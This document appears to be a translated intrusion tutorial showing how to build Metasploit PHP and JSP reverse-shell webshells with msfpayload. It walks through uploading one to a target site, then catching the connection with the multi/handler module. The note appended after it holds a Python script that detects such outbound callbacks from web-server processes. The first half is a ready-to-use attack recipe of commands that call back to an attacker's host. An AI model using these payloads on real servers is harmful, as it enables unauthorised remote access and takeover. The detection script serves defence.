When Linux privilege escalation fails, MSF (Metasploit) is often used.
1. Generate a webshell file
msf > msfpayload php/reverse_php LHOST=<your IP> LPORT=<port> R > dis9.php
My BT4 is in the /root/ directory, and it can be run only after dis9.php is added.
Upload dis9.php to your shell, for example, www.dis9.com/dis9.php.
2. Then set the handler module and its parameters in MSF.
msf > use multi/handler // enter the multi/handler module
msf exploit(handler) > set PAYLOAD php/reverse_php // if the module's options are unclear, look at info php/reverse_php first
msf exploit(handler) > set LHOST <your IP> // must be the same LHOST used when generating dis9.php, that is, your IP address
msf exploit(handler) > set LPORT 8080 // same as above
msf exploit(handler) > exploit // execute
3. Reverse shell
Then access your dis9.php:
root@bt4: links www.dis9.com/dis9.php
In this way, a reverse shell connects back to the handler.
Then we can carry on from there.
//////////////////////////////////////// //////////////////////////////////////// /////////////////
JSP
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > balckrootkit.jsp
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
-------------------
No port is set here, so the default port 4444 is used.
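
Seen from the web server's side, both payloads above make the PHP or Java process open an outbound TCP connection to LHOST:LPORT (8080 or the default 4444 in this walkthrough). The following is an added example, not part of the original page, that flags such connections in `ss -Htanp` output; the process-name list, the allowlisted backend and the sample lines are constructed assumptions.

```python
import re

# Assumptions (not from the page): process-name prefixes of the web stack and
# the backends it may legitimately connect out to.
WEB_PROCS = ("apache2", "httpd", "nginx", "php", "java")
ALLOWED_DESTS = {("10.0.0.20", 3306)}
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')

# Constructed sample of `ss -Htanp` output (run as root so users:(...) is shown).
SAMPLE = """\
LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:(("apache2",pid=812,fd=4))
ESTAB 0 0 10.0.0.5:80 203.0.113.9:51514 users:(("apache2",pid=815,fd=12))
ESTAB 0 0 10.0.0.5:40112 10.0.0.20:3306 users:(("apache2",pid=815,fd=13))
ESTAB 0 0 10.0.0.5:51830 198.51.100.7:8080 users:(("apache2",pid=816,fd=14))
ESTAB 0 0 10.0.0.5:47212 192.168.10.1:4444 users:(("java",pid=1402,fd=88))
ESTAB 0 0 10.0.0.5:22 203.0.113.50:60022 users:(("sshd",pid=990,fd=3))
"""

def split_addr(addr):
    """Split 'host:port' (or '[v6]:port') into (host, port-string)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), port

def suspicious_outbound(ss_output):
    """Return (process, pid, dest_host, dest_port) for web-stack processes
    holding an established connection they initiated to a non-allowlisted peer."""
    rows = [line.split(None, 5) for line in ss_output.splitlines()]
    rows = [r for r in rows if len(r) == 6]          # skip rows without process info
    listening = {split_addr(r[3])[1] for r in rows if r[0] == "LISTEN"}
    hits = []
    for state, _rq, _sq, local, peer, users in rows:
        proc = PROC_RE.search(users)
        if state != "ESTAB" or not proc or not proc.group(1).startswith(WEB_PROCS):
            continue
        if split_addr(local)[1] in listening:        # local side is a served port: inbound
            continue
        host, port = split_addr(peer)
        if (host, int(port)) not in ALLOWED_DESTS:
            hits.append((proc.group(1), int(proc.group(2)), host, int(port)))
    return hits

if __name__ == "__main__":
    for name, pid, host, port in suspicious_outbound(SAMPLE):
        print(f"outbound from web process {name} (pid {pid}) -> {host}:{port}")
```

A short-lived callback can be missed between samples, so an egress firewall rule that blocks the web server account from initiating connections remains the stronger control.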